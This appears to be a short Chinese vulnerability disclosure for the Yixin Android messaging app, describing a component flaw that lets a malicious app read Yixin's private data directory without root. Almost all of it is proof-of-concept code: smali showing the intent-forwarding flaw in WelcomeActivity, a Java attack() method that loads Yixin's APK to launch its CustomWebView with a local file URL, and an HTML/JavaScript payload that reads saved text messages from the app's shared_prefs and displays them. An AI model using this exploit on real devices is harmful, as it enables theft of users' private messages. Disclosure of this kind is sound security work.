易信组件信息泄露漏洞 可致恶意APP获取其私有目录数据（非root环境）

Lim/yixin/activity/WelcomeActivity;->getIntent()Landroid/content/Intent;......Landroid/content/Intent;->getParcelableExtra(Ljava/lang/String;)Landroid/os/Parcelable;......Lim/yixin/activity/WelcomeActivity;->startActivity(Landroid/content/Intent;)V

static final String YIXIN_PKG = "im.yixin"; static final String CustomWebView_ACTIVITY = "im.yixin.activity.CustomWebView"; static final String Welcome_ACTIVITY = "im.yixin.activity.WelcomeActivity";    public void attack()  {        Intent contIntent = new Intent();        contIntent.putExtra("url", "file:///mnt/sdcard/yixin.html");        Intent intent = new Intent();        intent.setClassName(YIXIN_PKG, Welcome_ACTIVITY);        Class lunch = null;        File aOptimizedDexOutputPath = getDir("outdex", Context.MODE_PRIVATE);        File dexFile = new File("/data/app/im.yixin-1.apk");          if(dexFile.exists()){ DexClassLoader loader = new DexClassLoader(dexFile.toString() , aOptimizedDexOutputPath.getAbsolutePath() , null , ClassLoader.getSystemClassLoader());       try {lunch = Class.forName("im.yixin.activity.CustomWebView",true,loader);} catch (ClassNotFoundException e) {e.printStackTrace();}        }        intent.putExtra("target", lunch);        intent.putExtra("data", contIntent);        this.startActivity(intent);    }

<html><body><script type="text/javascript">function getMessage() {var request = false;    if(window.XMLHttpRequest) {        request = new XMLHttpRequest();if(request.overrideMimeType) {request.overrideMimeType('text/xml');}    }     xmlhttp = request;    //获取本地文件代码    xmlhttp.open("GET", "file:////data/data/im.yixin/shared_prefs/saveTextMessage.xml", false);    xmlhttp.send(null);    var ret = xmlhttp.responseText;return ret;}alert(getMessage());</script></body></html>